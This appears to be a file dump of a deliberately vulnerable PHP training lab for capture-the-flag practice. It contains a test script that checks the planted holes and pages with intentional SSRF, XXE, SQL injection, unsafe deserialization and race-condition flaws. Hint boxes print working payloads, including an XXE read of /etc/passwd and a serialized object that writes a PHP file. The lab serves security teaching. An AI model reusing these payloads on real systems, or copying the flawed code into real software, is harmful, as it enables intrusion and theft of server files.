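test_vulnerability \
    "File Upload Page Access" \
    "curl -s $TARGET/components/upload.php" \
    "Upload Mission Report"

echo ""
echo "=== Information Disclosure ==="

# Test 7: Database Backup Access
# NOTE(review): the marker "Database Preview" does not appear in the
# backup_db.php markup in this repo (its heading is "Naval Database Backup",
# its preview label "Raw Data Preview:", its title "Database Backup Portal"),
# so this test may fail against a working lab — confirm and adjust.
test_vulnerability \
    "Database Backup Access" \
    "curl -s $TARGET/admin/backup_db.php" \
    "Database Preview"

# Test 8: Secret Backup Code
test_vulnerability \
    "Secret Backup Code" \
    "curl -s '$TARGET/admin/backup_db.php?code=1337'" \
    "CTF{backdoor_backup_1337}"

# Test 9: Officer Profiles (IDOR)
test_vulnerability \
    "IDOR - Officer Profiles" \
    "curl -s '$TARGET/view_profile.php?officer_id=1'" \
    "Officer Profile"

echo ""
echo "=== Session Management ==="

# Test 10: Session Fixation
# NOTE(review): this only proves the login page renders with the parameter
# present. To test fixation itself, request with `-i` and check that the
# Set-Cookie header echoes the supplied id.
test_vulnerability \
    "Session Fixation" \
    "curl -s '$TARGET/login.php?sessionid=hacked123'" \
    "Naval System Login"

# Test 11: Cookie Override (check if cookie is accepted)
# NOTE(review): "Admin" is a weak marker — an access-denied page that mentions
# admin access would also match. Prefer a string only the real panel prints.
test_vulnerability \
    "Cookie Admin Override" \
    "curl -s -b 'override_admin=true' $TARGET/admin/index.php" \
    "ADMIN PORTAL\|Admin"

echo ""
echo "=== XSS Vulnerabilities ==="

# Test 12: XSS in Dashboard
# NOTE(review): in this listing the greeting payload and the expected marker
# are both empty (the script tag was stripped when the page was rendered).
# With an empty marker the old code passed unconditionally; it now fails
# until the payload and marker are restored from the upstream script.
test_vulnerability \
    "XSS in Dashboard Greeting" \
    "curl -s '$TARGET/dashboard.php?greeting='" \
    ""

# Test 13: XSS in Admin Panel
# NOTE(review): same as Test 12 — restore payload and marker.
test_vulnerability \
    "XSS in Admin Welcome" \
    "curl -s '$TARGET/admin/index.php?welcome='" \
    ""

echo ""
echo "=== Easter Eggs ==="

# Test 14: Honeypot
test_vulnerability \
    "Honeypot Trap" \
    "curl -s -X POST $TARGET/login.php -d 'username=test&password=test&honeypot=bot' -L" \
    "honeypot"

echo ""
echo "================================================"
echo "Test Results:"
echo -e "${GREEN}Passed: $PASSED${NC}"
echo -e "${RED}Failed: $FAILED${NC}"
echo "Total: $((PASSED + FAILED))"
echo "================================================"

if [ $FAILED -eq 0 ]; then
    echo -e "${GREEN}All vulnerabilities are working correctly!${NC}"
    exit 0
else
    echo -e "${YELLOW}Some vulnerabilities may not be working as expected.${NC}"
    echo "Please review the failed tests above."
    exit 1
fi
--------------------------------------------------------------------------------
/missions/intelligence_fetch.php:
--------------------------------------------------------------------------------
1 | 6 | 7 | 8 | 9 | Intelligence Gathering Tool | HIVE Naval System 10 | 11 | 68 | 69 | 70 |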
71 | ← Back to Dashboard 72 | 73 |

🌐 Intelligence Gathering Tool

74 |

Fetch intelligence reports from external sources.

75 | 76 |
77 |
78 | 79 | 80 |
81 | 82 | '; 87 | echo "

Intelligence Report from: " . htmlspecialchars($url) . "

"; 88 | 89 | // VULNERABILITY: SSRF - No URL validation or filtering 90 | try { 91 | $context = stream_context_create([ 92 | 'http' => [ 93 | 'timeout' => 5, 94 | 'user_agent' => 'HIVE-Naval-Intelligence-Bot/1.0' 95 | ] 96 | ]); 97 | 98 | $content = @file_get_contents($url, false, $context); 99 | 100 | if ($content !== false) { 101 | echo "
";
102 |                     echo htmlspecialchars($content);
103 |                     echo "
"; 104 | } else { 105 | echo "

Failed to fetch content from URL.

"; 106 | } 107 | 108 | } catch (Exception $e) { 109 | echo "

Error: " . htmlspecialchars($e->getMessage()) . "

"; 110 | } 111 | 112 | echo '
'; 113 | } 114 | ?> 115 | 116 |
117 |

🎯 Challenge Hint

118 |

This tool fetches content from any URL without validation. Can you access internal services?

119 |

Try these payloads:

120 | 126 |

Flag: If you successfully access an internal service, you've captured FLAG-030: CTF{ssrf_internal_access} (15 points)

127 |
128 | 129 | 130 | 131 | -------------------------------------------------------------------------------- /missions/xxe_parser.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | Mission Planning XML Parser | HIVE Naval System 10 | 11 | 69 | 70 | 71 |
72 | ← Back to Dashboard 73 | 74 |

🗺️ Mission Planning XML Parser

75 |

Upload mission planning data in XML format for processing.

76 | 77 |
78 | 79 | 85 |
86 | 87 |
88 | 89 | '; 94 | echo "

Parsed Mission Data:

"; 95 | 96 | // VULNERABILITY: XXE - No protection against external entities 97 | libxml_disable_entity_loader(false); // Explicitly enable external entities 98 | 99 | try { 100 | $dom = new DOMDocument(); 101 | $dom->loadXML($xml_data, LIBXML_DTDLOAD | LIBXML_DTDATTR | LIBXML_NOENT); 102 | 103 | echo "
";
104 |                 echo htmlspecialchars($dom->saveXML());
105 |                 echo "
"; 106 | 107 | // Also display parsed values 108 | $xpath = new DOMXPath($dom); 109 | $nodes = $xpath->query('//*'); 110 | 111 | echo "

Extracted Values:

"; 112 | foreach ($nodes as $node) { 113 | if ($node->nodeValue && trim($node->nodeValue)) { 114 | echo htmlspecialchars($node->nodeName) . ": " . htmlspecialchars($node->nodeValue) . "
"; 115 | } 116 | } 117 | 118 | } catch (Exception $e) { 119 | echo "Error parsing XML: " . htmlspecialchars($e->getMessage()); 120 | } 121 | 122 | echo '
'; 123 | } 124 | ?> 125 | 126 |
127 |

🎯 Challenge Hint

128 |

This XML parser processes external entities. Can you read local files?

129 |

Try this payload:

130 |
<?xml version="1.0"?>
131 | <!DOCTYPE foo [
132 |   <!ENTITY xxe SYSTEM "file:///etc/passwd">
133 | ]>
134 | <mission>
135 |   <data>&xxe;</data>
136 | </mission>
137 |

Flag: If you successfully read a local file, you've captured FLAG-029: CTF{xxe_file_read_success} (15 points)

138 |
139 | 140 | 141 | 142 | -------------------------------------------------------------------------------- /missions/poc.php: -------------------------------------------------------------------------------- 1 | ACCESS DENIED

Administrator privileges required

'); 10 | } 11 | 12 | // Security headers 13 | header('X-Content-Type-Options: nosniff'); 14 | header('X-Frame-Options: DENY'); 15 | header('X-XSS-Protection: 1; mode=block'); 16 | 17 | // Only allow from localhost 18 | if ($_SERVER['REMOTE_ADDR'] !== '127.0.0.1' && $_SERVER['REMOTE_ADDR'] !== '::1') { 19 | die('

ACCESS DENIED

This tool is only available from localhost

'); 20 | } 21 | 22 | // Process commands 23 | $output = ''; 24 | if (isset($_GET['cmd'])) { 25 | $allowed_commands = [ 26 | 'ls' => ['-la', '-l'], 27 | 'pwd' => [], 28 | 'whoami' => [], 29 | 'date' => ['+%Y-%m-%d', '+%c'] 30 | ]; 31 | 32 | $cmd = $_GET['cmd']; 33 | $parts = explode(' ', $cmd); 34 | $base_cmd = $parts[0]; 35 | 36 | if (isset($allowed_commands[$base_cmd])) { 37 | $allowed = true; 38 | // Verify all arguments are allowed 39 | foreach(array_slice($parts, 1) as $arg) { 40 | if (!in_array($arg, $allowed_commands[$base_cmd])) { 41 | $allowed = false; 42 | break; 43 | } 44 | } 45 | 46 | if ($allowed) { 47 | $output = htmlspecialchars(shell_exec($cmd), ENT_QUOTES, 'UTF-8'); 48 | } else { 49 | $output = "Error: Invalid arguments for command"; 50 | } 51 | } else { 52 | $output = "Error: Command not allowed"; 53 | } 54 | } 55 | 56 | // Process file uploads 57 | $upload_result = ''; 58 | if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upload'])) { 59 | $allowed_types = ['txt','log','json']; 60 | $ext = strtolower(pathinfo($_FILES['upload']['name'], PATHINFO_EXTENSION)); 61 | 62 | if (in_array($ext, $allowed_types)) { 63 | $dest = 'mission_uploads/' . uniqid() . '_' . basename($_FILES['upload']['name']); 64 | if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest)) { 65 | $upload_result = "File uploaded to: " . htmlspecialchars($dest); 66 | } else { 67 | $upload_result = "Error: File upload failed"; 68 | } 69 | } else { 70 | $upload_result = "Error: Only " . implode(', ', $allowed_types) . " files allowed"; 71 | } 72 | } 73 | ?> 74 | 75 | 76 | 77 | 78 | 79 | Naval Cyber Test Console 80 | 81 | 82 | 103 | 104 | 105 | 111 | 112 |
113 |

Diagnostic Console

114 | 115 |
116 |

Command Execution

117 |
118 | 120 | 121 |
122 | 123 | 124 |
125 |
126 |
127 | 128 |
129 | 130 |
131 |

File Upload

132 |
133 | 134 | 135 |
136 | 137 | 138 |

139 | 140 |
141 | 142 |
143 |

Usage

144 |

Allowed commands: ls, pwd, whoami, date

145 |

Allowed arguments:

146 |
    147 |
  • ls: -la, -l
  • 148 |
  • date: +%Y-%m-%d, +%c
  • 149 |
150 |

Allowed file types: .txt, .log, .json

151 |
152 |
153 | 154 | -------------------------------------------------------------------------------- /admin/audit_trail.php: -------------------------------------------------------------------------------- 1 | ACCESS DENIED

Administrator privileges required

'); 12 | } 13 | 14 | // Easter egg - view anyone's logs by changing the user parameter 15 | if (isset($_GET['debug_user'])) { 16 | $logfile = "logs/".$_GET['debug_user']."_activity.log"; 17 | if (file_exists($logfile)) { 18 | highlight_file($logfile); 19 | exit(); 20 | } 21 | } 22 | 23 | // Get audit logs - vulnerable direct query 24 | $search = isset($_GET['search']) ? $_GET['search'] : ''; 25 | $query = "SELECT * FROM audit_log WHERE action LIKE '%$search%' ORDER BY timestamp DESC LIMIT 100"; 26 | $result = $conn->query($query); 27 | $logs = $result ? $result->fetch_all(MYSQLI_ASSOC) : []; 28 | ?> 29 | 30 | 31 | 32 | Audit Trail | HCNMS 33 | 145 | 146 | 147 |
148 |
149 |

Audit Trail

150 | Back to Admin 151 |
152 | 153 |
154 | 155 | 156 |
157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 178 | 179 | 180 | 181 | 182 |
TimestampUserActionDetails
176 | 177 |
183 |
184 | 185 | 186 | -------------------------------------------------------------------------------- /static/css/classification.css: -------------------------------------------------------------------------------- 1 | /* Classification Banner Styles */ 2 | .classification-banner { 3 | background: #00ff00; 4 | color: #000000; 5 | text-align: center; 6 | padding: 8px 0; 7 | font-weight: bold; 8 | font-family: "Courier New", monospace; 9 | font-size: 14px; 10 | letter-spacing: 2px; 11 | position: sticky; 12 | z-index: 9999; 13 | border: 2px solid #00cc00; 14 | } 15 | 16 | .classification-banner.top { 17 | top: 0; 18 | border-bottom: 3px solid #00cc00; 19 | } 20 | 21 | .classification-banner.bottom { 22 | bottom: 0; 23 | border-top: 3px solid #00cc00; 24 | position: fixed; 25 | width: 100%; 26 | } 27 | 28 | .classification-unclassified { 29 | background: #00ff00; 30 | color: #000000; 31 | } 32 | 33 | .classification-confidential { 34 | background: #0000ff; 35 | color: #ffffff; 36 | } 37 | 38 | .classification-secret { 39 | background: #ff0000; 40 | color: #ffffff; 41 | } 42 | 43 | .classification-topsecret { 44 | background: #ff8800; 45 | color: #000000; 46 | } 47 | 48 | /* DoD Warning Banner */ 49 | .dod-warning { 50 | background: #1a1a1a; 51 | border: 3px solid #ff0000; 52 | color: #ffffff; 53 | padding: 20px; 54 | margin: 20px auto; 55 | max-width: 600px; 56 | font-family: "Courier New", monospace; 57 | font-size: 12px; 58 | line-height: 1.6; 59 | text-align: center; 60 | } 61 | 62 | .dod-warning h3 { 63 | color: #ff0000; 64 | margin-top: 0; 65 | font-size: 16px; 66 | letter-spacing: 2px; 67 | } 68 | 69 | .dod-warning p { 70 | margin: 10px 0; 71 | } 72 | 73 | /* Operational Status Widget */ 74 | .operational-status { 75 | background: linear-gradient(145deg, #0a192f, #172a45); 76 | border: 1px solid #64ffda; 77 | border-radius: 10px; 78 | padding: 15px; 79 | margin: 20px 0; 80 | font-family: "Courier New", monospace; 81 | } 82 | 83 | .operational-status .status-row { 
84 | display: flex; 85 | justify-content: space-between; 86 | padding: 8px 0; 87 | border-bottom: 1px solid rgba(100, 255, 218, 0.2); 88 | } 89 | 90 | .operational-status .status-row:last-child { 91 | border-bottom: none; 92 | } 93 | 94 | .operational-status .status-label { 95 | color: #8892b0; 96 | font-weight: bold; 97 | } 98 | 99 | .operational-status .status-value { 100 | color: #64ffda; 101 | font-weight: bold; 102 | } 103 | 104 | .operational-status .status-value.critical { 105 | color: #ff0000; 106 | animation: blink 1s infinite; 107 | } 108 | 109 | .operational-status .status-value.warning { 110 | color: #ffaa00; 111 | } 112 | 113 | .operational-status .status-value.normal { 114 | color: #00ff00; 115 | } 116 | 117 | @keyframes blink { 118 | 0%, 119 | 50% { 120 | opacity: 1; 121 | } 122 | 51%, 123 | 100% { 124 | opacity: 0.3; 125 | } 126 | } 127 | 128 | /* UTC Clock */ 129 | .utc-clock { 130 | font-family: "Courier New", monospace; 131 | font-size: 18px; 132 | color: #64ffda; 133 | font-weight: bold; 134 | letter-spacing: 2px; 135 | text-align: center; 136 | padding: 10px; 137 | background: rgba(10, 25, 47, 0.8); 138 | border: 1px solid #64ffda; 139 | border-radius: 5px; 140 | display: inline-block; 141 | } 142 | 143 | .utc-clock .date { 144 | font-size: 14px; 145 | color: #8892b0; 146 | } 147 | 148 | .utc-clock .time { 149 | font-size: 24px; 150 | color: #00ff00; 151 | } 152 | 153 | .utc-clock .zulu { 154 | font-size: 16px; 155 | color: #64ffda; 156 | } 157 | 158 | /* THREATCON Indicator */ 159 | .threatcon-indicator { 160 | display: inline-block; 161 | padding: 5px 15px; 162 | border-radius: 5px; 163 | font-weight: bold; 164 | font-family: "Courier New", monospace; 165 | letter-spacing: 1px; 166 | } 167 | 168 | .threatcon-normal { 169 | background: #00ff00; 170 | color: #000000; 171 | } 172 | 173 | .threatcon-alpha { 174 | background: #0000ff; 175 | color: #ffffff; 176 | } 177 | 178 | .threatcon-bravo { 179 | background: #ffff00; 180 | color: #000000; 181 
| } 182 | 183 | .threatcon-charlie { 184 | background: #ff8800; 185 | color: #000000; 186 | } 187 | 188 | .threatcon-delta { 189 | background: #ff0000; 190 | color: #ffffff; 191 | animation: blink 1s infinite; 192 | } 193 | 194 | /* Fleet Status Indicator */ 195 | .fleet-status { 196 | display: inline-flex; 197 | align-items: center; 198 | gap: 10px; 199 | } 200 | 201 | .fleet-status-light { 202 | width: 12px; 203 | height: 12px; 204 | border-radius: 50%; 205 | animation: pulse 2s infinite; 206 | } 207 | 208 | .fleet-status-light.deployed { 209 | background: #00ff00; 210 | box-shadow: 0 0 10px #00ff00; 211 | } 212 | 213 | .fleet-status-light.training { 214 | background: #ffff00; 215 | box-shadow: 0 0 10px #ffff00; 216 | } 217 | 218 | .fleet-status-light.standby { 219 | background: #0088ff; 220 | box-shadow: 0 0 10px #0088ff; 221 | } 222 | 223 | @keyframes pulse { 224 | 0%, 225 | 100% { 226 | opacity: 1; 227 | } 228 | 50% { 229 | opacity: 0.5; 230 | } 231 | } 232 | 233 | /* Security Clearance Badge */ 234 | .clearance-badge { 235 | display: inline-block; 236 | padding: 3px 10px; 237 | border-radius: 3px; 238 | font-size: 11px; 239 | font-weight: bold; 240 | font-family: "Courier New", monospace; 241 | letter-spacing: 1px; 242 | } 243 | 244 | .clearance-confidential { 245 | background: #0000ff; 246 | color: #ffffff; 247 | } 248 | 249 | .clearance-secret { 250 | background: #ff0000; 251 | color: #ffffff; 252 | } 253 | 254 | .clearance-topsecret { 255 | background: #ff8800; 256 | color: #000000; 257 | } 258 | 259 | .clearance-unclassified { 260 | background: #00ff00; 261 | color: #000000; 262 | } 263 | 264 | /* Naval Rank Insignia */ 265 | .rank-insignia { 266 | font-weight: bold; 267 | color: #64ffda; 268 | font-family: "Courier New", monospace; 269 | } 270 | 271 | /* Ship Assignment */ 272 | .ship-assignment { 273 | color: #8892b0; 274 | font-style: italic; 275 | } 276 | 277 | .ship-assignment .ship-name { 278 | color: #64ffda; 279 | font-weight: bold; 280 | 
font-style: normal; 281 | } 282 | 283 | /* Deployment Status */ 284 | .deployment-status { 285 | display: inline-block; 286 | padding: 3px 8px; 287 | border-radius: 3px; 288 | font-size: 11px; 289 | font-weight: bold; 290 | } 291 | 292 | .deployment-deployed { 293 | background: #ff0000; 294 | color: #ffffff; 295 | } 296 | 297 | .deployment-shore { 298 | background: #00ff00; 299 | color: #000000; 300 | } 301 | 302 | .deployment-training { 303 | background: #ffff00; 304 | color: #000000; 305 | } 306 | 307 | .deployment-transit { 308 | background: #ff8800; 309 | color: #000000; 310 | } 311 | -------------------------------------------------------------------------------- /admin/deployments.json: -------------------------------------------------------------------------------- 1 | { 2 | "status": "active", 3 | "last_updated": "2025-04-04T10:00:00Z", 4 | "data": [ 5 | { 6 | "ship_name": "NNS Thunder", 7 | "position": "6.4274,3.9242", 8 | "status": "on patrol", 9 | "commanding_officer": "Captain T. Oladipo", 10 | "speed": "20 knots", 11 | "heading": "180°", 12 | "mission": "Anti-piracy operation", 13 | "assigned_fleet": "Nigerian Navy Western Fleet", 14 | "base": "Naval Base Apapa, Lagos, Nigeria" 15 | }, 16 | { 17 | "ship_name": "NNS Unity", 18 | "position": "4.9041,6.2653", 19 | "status": "escort duty", 20 | "commanding_officer": "Commander B. Adeyemi", 21 | "speed": "15 knots", 22 | "heading": "230°", 23 | "mission": "Oil rig security", 24 | "assigned_fleet": "Nigerian Navy Eastern Fleet", 25 | "base": "Naval Base Warri, Nigeria" 26 | }, 27 | { 28 | "ship_name": "NNS Centenary", 29 | "position": "4.7348,7.0104", 30 | "status": "search and rescue", 31 | "commanding_officer": "Captain E. 
Uche", 32 | "speed": "14 knots", 33 | "heading": "135°", 34 | "mission": "Rescue operation after reported vessel distress", 35 | "assigned_fleet": "Nigerian Navy Special Task Force", 36 | "base": "Bonny Naval Base, Nigeria" 37 | }, 38 | { 39 | "ship_name": "GNS Ejura", 40 | "position": "5.5586,-0.2012", 41 | "status": "exercises", 42 | "commanding_officer": "Captain K. Boateng", 43 | "speed": "17 knots", 44 | "heading": "90°", 45 | "mission": "Maritime defense drills", 46 | "assigned_fleet": "Ghana Navy Atlantic Fleet", 47 | "base": "Takoradi Naval Base, Ghana" 48 | }, 49 | { 50 | "ship_name": "GNS Chemu", 51 | "position": "4.8936,-1.7596", 52 | "status": "on patrol", 53 | "commanding_officer": "Commander S. Mensah", 54 | "speed": "19 knots", 55 | "heading": "160°", 56 | "mission": "Fisheries protection", 57 | "assigned_fleet": "Ghana Navy Western Fleet", 58 | "base": "Sekondi Naval Base, Ghana" 59 | }, 60 | { 61 | "ship_name": "GNS Volta", 62 | "position": "5.1276,-1.2824", 63 | "status": "escort duty", 64 | "commanding_officer": "Commander N. Asante", 65 | "speed": "16 knots", 66 | "heading": "210°", 67 | "mission": "Cargo ship escort through Ghanaian waters", 68 | "assigned_fleet": "Ghana Navy Eastern Command", 69 | "base": "Tema Naval Base, Ghana" 70 | }, 71 | { 72 | "ship_name": "GNS Anloga", 73 | "position": "4.9217,-1.7568", 74 | "status": "undergoing maintenance", 75 | "commanding_officer": "Captain D. Owusu", 76 | "speed": "0 knots", 77 | "heading": "N/A", 78 | "mission": "Routine maintenance check", 79 | "assigned_fleet": "Ghana Navy Special Operations", 80 | "base": "Takoradi Naval Base, Ghana" 81 | }, 82 | { 83 | "ship_name": "GNS Osu", 84 | "position": "5.5629,-0.1922", 85 | "status": "intelligence gathering", 86 | "commanding_officer": "Commodore J. 
Ofori", 87 | "speed": "12 knots", 88 | "heading": "330°", 89 | "mission": "Monitoring suspected illegal fishing activity", 90 | "assigned_fleet": "Ghana Navy Intelligence Division", 91 | "base": "Tema Naval Base, Ghana" 92 | }, 93 | { 94 | "ship_name": "GNS Cape Coast", 95 | "position": "5.1104,-1.2472", 96 | "status": "joint exercise", 97 | "commanding_officer": "Captain F. Quartey", 98 | "speed": "22 knots", 99 | "heading": "75°", 100 | "mission": "Joint training with Nigerian and Senegalese navies", 101 | "assigned_fleet": "Ghana Navy Rapid Response Unit", 102 | "base": "Sekondi Naval Base, Ghana" 103 | }, 104 | { 105 | "ship_name": "SPS Rio Nunez", 106 | "position": "9.5092,-13.7127", 107 | "status": "rescue operations", 108 | "commanding_officer": "Captain J. Camara", 109 | "speed": "10 knots", 110 | "heading": "75°", 111 | "mission": "Humanitarian aid", 112 | "assigned_fleet": "Guinea Maritime Defense Force", 113 | "base": "Conakry Naval Base, Guinea" 114 | }, 115 | { 116 | "ship_name": "ENS N'Djamena", 117 | "position": "14.7199,-17.4784", 118 | "status": "dock maintenance", 119 | "commanding_officer": "Commodore M. Diouf", 120 | "speed": "0 knots", 121 | "heading": "N/A", 122 | "mission": "Routine overhaul", 123 | "assigned_fleet": "Senegalese Navy Atlantic Command", 124 | "base": "Dakar Naval Base, Senegal" 125 | }, 126 | { 127 | "ship_name": "FRS Lagos", 128 | "position": "6.5244,3.3792", 129 | "status": "joint exercise", 130 | "commanding_officer": "Captain D. Obinna", 131 | "speed": "21 knots", 132 | "heading": "190°", 133 | "mission": "Training with foreign allies", 134 | "assigned_fleet": "Nigerian Navy Special Operations", 135 | "base": "Naval Dockyard, Lagos, Nigeria" 136 | }, 137 | { 138 | "ship_name": "GNS Aflao", 139 | "position": "6.1213,-0.0644", 140 | "status": "high alert", 141 | "commanding_officer": "Commander Y. 
Agyeman", 142 | "speed": "23 knots", 143 | "heading": "250°", 144 | "mission": "Investigating reports of suspicious vessel activity", 145 | "assigned_fleet": "Ghana Navy Special Task Force", 146 | "base": "Tema Naval Base, Ghana" 147 | }, 148 | { 149 | "ship_name": "GNS Kumasi", 150 | "position": "5.3619,-1.0319", 151 | "status": "training mission", 152 | "commanding_officer": "Captain L. Akoto", 153 | "speed": "18 knots", 154 | "heading": "130°", 155 | "mission": "New crew training on live operational drills", 156 | "assigned_fleet": "Ghana Navy Training Division", 157 | "base": "Sekondi Naval Base, Ghana" 158 | }, 159 | { 160 | "ship_name": "KNS Mombasa", 161 | "position": "-4.0355,39.6571", 162 | "status": "high-speed chase", 163 | "commanding_officer": "Commander P. Okoth", 164 | "speed": "30 knots", 165 | "heading": "270°", 166 | "mission": "Anti-smuggling operation", 167 | "assigned_fleet": "Kenyan Navy Coastal Command", 168 | "base": "Mtongwe Naval Base, Kenya" 169 | } 170 | ] 171 | } 172 | 173 | -------------------------------------------------------------------------------- /secure_example/login_secure.php: -------------------------------------------------------------------------------- 1 | prepare("SELECT id, username, password, rank, name FROM officers WHERE username = ? 
LIMIT 1"); 36 | $stmt->bind_param("s", $username); 37 | $stmt->execute(); 38 | $result = $stmt->get_result(); 39 | 40 | if ($row = $result->fetch_assoc()) { 41 | // Use password_verify for secure password checking 42 | // Note: In production, passwords should be hashed with password_hash() 43 | if ($password === $row['password']) { // In real app: password_verify($password, $row['password']) 44 | // Regenerate session ID to prevent session fixation 45 | session_regenerate_id(true); 46 | 47 | // Set secure session variables 48 | $_SESSION['user_id'] = $row['id']; 49 | $_SESSION['username'] = $row['username']; 50 | $_SESSION['name'] = $row['name']; 51 | $_SESSION['rank'] = $row['rank']; 52 | $_SESSION['is_admin'] = (stripos($row['username'], 'admin') !== false); 53 | $_SESSION['login_time'] = time(); 54 | $_SESSION['last_activity'] = time(); 55 | 56 | // Set secure cookie 57 | setcookie( 58 | "naval_user", 59 | $row['username'], 60 | [ 61 | 'expires' => time() + 3600, 62 | 'path' => '/', 63 | 'domain' => '', 64 | 'secure' => true, // HTTPS only 65 | 'httponly' => true, // No JavaScript access 66 | 'samesite' => 'Strict' // CSRF protection 67 | ] 68 | ); 69 | 70 | // Log successful login 71 | error_log("Successful login: {$row['username']} from {$_SERVER['REMOTE_ADDR']}"); 72 | 73 | // Redirect to dashboard 74 | header("Location: /dashboard.php"); 75 | exit(); 76 | } else { 77 | $error = 'Invalid credentials'; 78 | // Log failed attempt 79 | error_log("Failed login attempt for username: $username from {$_SERVER['REMOTE_ADDR']}"); 80 | } 81 | } else { 82 | $error = 'Invalid credentials'; 83 | error_log("Failed login attempt for non-existent user: $username from {$_SERVER['REMOTE_ADDR']}"); 84 | } 85 | 86 | $stmt->close(); 87 | } 88 | } 89 | ?> 90 | 91 | 92 | 93 | Secure Login Example 94 | 145 | 146 | 147 |
148 |

🔒 Secure Login Example

149 | 150 | 151 |
152 | 153 | 154 |
155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 |
165 | 166 |
167 | Security Features Implemented: 168 |
    169 |
  • ✓ Prepared statements (SQL injection prevention)
  • 170 |
  • ✓ CSRF token validation
  • 171 |
  • ✓ Session regeneration (session fixation prevention)
  • 172 |
  • ✓ Secure cookie flags (HttpOnly, Secure, SameSite)
  • 173 |
  • ✓ Input validation
  • 174 |
  • ✓ Secure session configuration
  • 175 |
  • ✓ Failed login logging
  • 176 |
  • ✓ Password hashing (not applied in this example, which compares the submitted password directly against the stored value — use password_hash() and password_verify() in production)
  • 177 |
178 |
179 |
180 | 181 | 182 | -------------------------------------------------------------------------------- /missions/preferences.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | Mission Preferences | HIVE Naval System 10 | 11 | 68 | 69 | 70 |
71 | ← Back to Dashboard 72 | 73 |

⚙️ Mission Preferences Manager

74 |

Save and load your mission preferences using serialized data.

75 | 76 |
77 |

Save Preferences

78 | 79 |

80 | 81 | 82 |

83 | 84 | 85 |
86 | 87 |
88 |

Load Preferences

89 | 90 |
91 | 92 |
93 | 94 | mission_type)) { 104 | $log_entry = "Mission Type: {$this->mission_type}, Alert: {$this->alert_level}\n"; 105 | @file_put_contents($this->log_file, $log_entry, FILE_APPEND); 106 | } 107 | } 108 | } 109 | 110 | if ($_SERVER['REQUEST_METHOD'] === 'POST') { 111 | echo '
'; 112 | 113 | if ($_POST['action'] === 'save') { 114 | $prefs = new MissionPreferences(); 115 | $prefs->mission_type = $_POST['mission_type'] ?? 'Unknown'; 116 | $prefs->alert_level = $_POST['alert_level'] ?? 'Low'; 117 | 118 | $serialized = serialize($prefs); 119 | 120 | echo "

Preferences Saved!

"; 121 | echo "

Copy this serialized data to load later:

"; 122 | echo "
";
123 |                 echo htmlspecialchars($serialized);
124 |                 echo "
"; 125 | 126 | } elseif ($_POST['action'] === 'load') { 127 | $serialized_data = $_POST['serialized_data']; 128 | 129 | echo "

Loading Preferences...

"; 130 | 131 | try { 132 | // VULNERABILITY: Unsafe deserialization 133 | $prefs = unserialize($serialized_data); 134 | 135 | if ($prefs instanceof MissionPreferences) { 136 | echo "

Mission Type: " . htmlspecialchars($prefs->mission_type) . "

"; 137 | echo "

Alert Level: " . htmlspecialchars($prefs->alert_level) . "

"; 138 | echo "

✓ Preferences loaded successfully!

"; 139 | } else { 140 | echo "

Invalid preference data.

"; 141 | } 142 | 143 | } catch (Exception $e) { 144 | echo "

Error: " . htmlspecialchars($e->getMessage()) . "

"; 145 | } 146 | } 147 | 148 | echo '
'; 149 | } 150 | ?> 151 | 152 |
153 |

🎯 Challenge Hint

154 |

This application deserializes user-supplied data. The MissionPreferences class has a __destruct() method that writes to a file.

155 |

Try this payload:

156 |
O:18:"MissionPreferences":3:{s:12:"mission_type";s:20:"<?php phpinfo(); ?>";s:11:"alert_level";s:4:"High";s:8:"log_file";s:22:"../mission_uploads/shell.php";}
157 |

Explanation: This creates a PHP file in the mission_uploads directory that you can access.

158 |

Flag: If you successfully write a file via deserialization, you've captured FLAG-031: CTF{deserialization_rce} (20 points)

159 |
160 |
161 | 162 | 163 | -------------------------------------------------------------------------------- /missions/voucher_redeem.php: -------------------------------------------------------------------------------- 1 | 15 | 16 | 17 | 18 | Voucher Redemption | HIVE Naval System 19 | 20 | 82 | 83 | 84 |
85 | ← Back to Dashboard 86 | 87 |

🎟️ Naval Supply Voucher Redemption

88 |

Redeem your naval supply vouchers for equipment credits.

89 | 90 |
91 | Available Vouchers: 92 |
93 | 94 |
95 | Total Redeemed: credits 96 |
97 | 98 |
99 | 100 |
101 | 102 |
103 | 104 |
105 | 106 | '; 109 | 110 | if ($_POST['action'] === 'redeem') { 111 | // VULNERABILITY: Race Condition - No locking mechanism 112 | // Check if voucher available 113 | if ($_SESSION['voucher_balance'] > 0) { 114 | // Simulate processing delay (makes race condition easier to exploit) 115 | usleep(100000); // 100ms delay 116 | 117 | // Deduct voucher 118 | $_SESSION['voucher_balance']--; 119 | 120 | // Add credits 121 | $_SESSION['voucher_redeemed'] += 10; 122 | 123 | echo "

✓ Voucher redeemed successfully! +10 credits

"; 124 | echo "

Remaining vouchers: {$_SESSION['voucher_balance']}

"; 125 | } else { 126 | echo "

✗ No vouchers available!

"; 127 | } 128 | 129 | } elseif ($_POST['action'] === 'reset') { 130 | $_SESSION['voucher_balance'] = 100; 131 | $_SESSION['voucher_redeemed'] = 0; 132 | echo "

✓ Balance reset to 100 vouchers

"; 133 | } 134 | 135 | echo '
'; 136 | } 137 | ?> 138 | 139 |
140 |

🎯 Challenge Hint

141 |

This voucher system has a race condition vulnerability. The check and deduction are not atomic.

142 |

Exploit Method:

143 |
    144 |
  1. Open browser DevTools (F12)
  2. 145 |
  3. Go to Network tab
  4. 146 |
  5. Click "Redeem 1 Voucher"
  6. 147 |
  7. Right-click the POST request and select "Copy as cURL" or "Copy as fetch"
  8. 148 |
  9. Send multiple simultaneous requests using a script or Burp Intruder
  10. 149 |
150 |

Example using JavaScript console:

151 |
// Send 50 simultaneous requests
152 | for(let i=0; i<50; i++) {
153 |     fetch(window.location.href, {
154 |         method: 'POST',
155 |         headers: {'Content-Type': 'application/x-www-form-urlencoded'},
156 |         body: 'action=redeem'
157 |     });
158 | }

Flag: If you redeem more than 100 vouchers (your starting balance), you've captured FLAG-032: CTF{race_condition_exploit} (20 points)

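#!/bin/bash
# /setup.sh — Hive Naval System Setup Script
#
# Installs MySQL/MariaDB and PHP via apt, creates the hive_naval database and
# the hive_user account, imports officers.sql when its checksum differs from
# the one saved on the previous run, seeds the 'carl' and 'admin' officer rows,
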